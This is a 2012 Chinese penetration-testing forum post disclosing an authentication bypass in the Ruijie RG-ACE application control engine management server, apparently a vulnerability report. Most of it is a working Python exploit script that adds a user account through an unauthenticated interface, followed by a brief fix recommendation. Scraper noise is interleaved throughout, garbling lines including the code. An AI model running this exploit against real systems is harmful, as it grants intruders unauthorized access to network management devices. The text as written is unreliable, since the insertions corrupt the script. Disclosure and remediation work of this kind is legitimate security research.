找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 锐捷应用控制引擎管理服务器可以增加用户
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2191|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)) i- \9 P$ q) w  Q, U8 R

. {+ e! U4 N: M3 T. J+ r5 F5 v0 |8 R7 Q4 t% ?- |8 h$ L8 w; |
测试的具体版本是
$ N, G4 \3 @" w" k' f7 t6 Y  @产品名称: 锐捷应用控制引擎
; `8 d6 A; b$ V3 G) B版本号: 3.1.36.001 TC, n. L) A# m2 l3 L6 L
编译时间: 201104291730+ r% O- X/ u4 }2 L  m
' x3 f0 S8 Z' E: Q
- Q2 U/ ^. j1 x- b
漏洞证明:  s, b# y2 L4 Q, W
# j2 `7 |$ s  q

# \' Z2 [; K% x4 D/ K5 N3 J( O' Y$ C5 m- b4 J) ~5 p, v7 U

% _3 m3 ^$ k+ D& W/ @: a3 O- X: ^4 W
1 E2 b! u8 j4 x1 W" _, ~( l2 r
; n  j2 @' R. \. y( c7 o执行脚本( u$ Q. l3 T, Q
#! /usr/bin/env python7 Y% x6 b4 @- x( h
#coding=gbk
2 Z! a+ D: Q6 a4 O+ w#RG-ACE管理服务器 V3.1.36.001
) Z3 @! W1 X1 {, E  Y& ~/ q9 Kimport urllib2, urllib,cookielib& c/ Z2 d# }' W$ @. A
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
, T7 X, F6 i/ Z- i1 o4 L: nopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))/ j8 L/ o7 B4 X6 ]6 B
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
  I' A  A9 `9 \1 q' H: Lpost=(("event","userManager.doInsertUserInfo"),
7 V( D$ A1 P; r0 b("useractionname","addButtonValue"),
, [  i1 K( Q) c9 s& T/ F7 |("useropermanager","userManager"),
. ]3 d* Q0 _$ r1 q4 X1 F("userName","t"), #######账号自己加
5 T( a/ J. v/ O( L("pwd","aaaaaa"),######密码自己加! n% n& Q5 l) ^
("trueName","ad"),; |2 h$ {  C) u; |. O. _6 y) b
("email",""),9 {3 r8 J3 R4 k/ S
("mobilePhone",""),
5 |" w2 e( s" g( ^% g% F("officePhone",""),& d! M9 o$ A8 h1 `- D# Z
("addr",""),
2 b4 Z1 s5 N# i* ]/ L% r("submit","确定"))
5 L% \+ Z6 P$ [# F7 f. Jurllib2.install_opener(opener); H/ `  M; m. Y# P$ f: I
p=urllib2.urlopen(url, urllib.urlencode(post)).read()" \6 A+ I$ x" O; A
print "Done", t  R9 F; ^8 z( W

8 b  ?% b  ~* y8 L/ u. q登录,连接设备
, S9 ^* q. y& a5 E/ N2 K/ m0 {  A& Z" d) I9 J
$ ^; T- y- z8 W' q
' O5 f* h9 V) D, O2 A& Q( x( a
# O3 g1 g( e. |0 @% ~; [

9 j1 x5 [8 G& _* {& x默认的管理员admin权限更大点
$ X+ M$ g* ~! I- O9 X! E; v3 N
. G# \8 a# ^" K: _9 l
* ]9 I+ c, n9 z# t6 K; w
. n% Y( Y. k  I 3 e' l: Z* q2 z- ?% i5 G
) ]5 J  X( w$ v: ?
修复方案:7 V7 I0 i% `: R) d$ K
加强对接口的权限验证
' P: k# L: S  n, q9 ]7 J
6 M; o0 ^: L) V4 c3 O
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表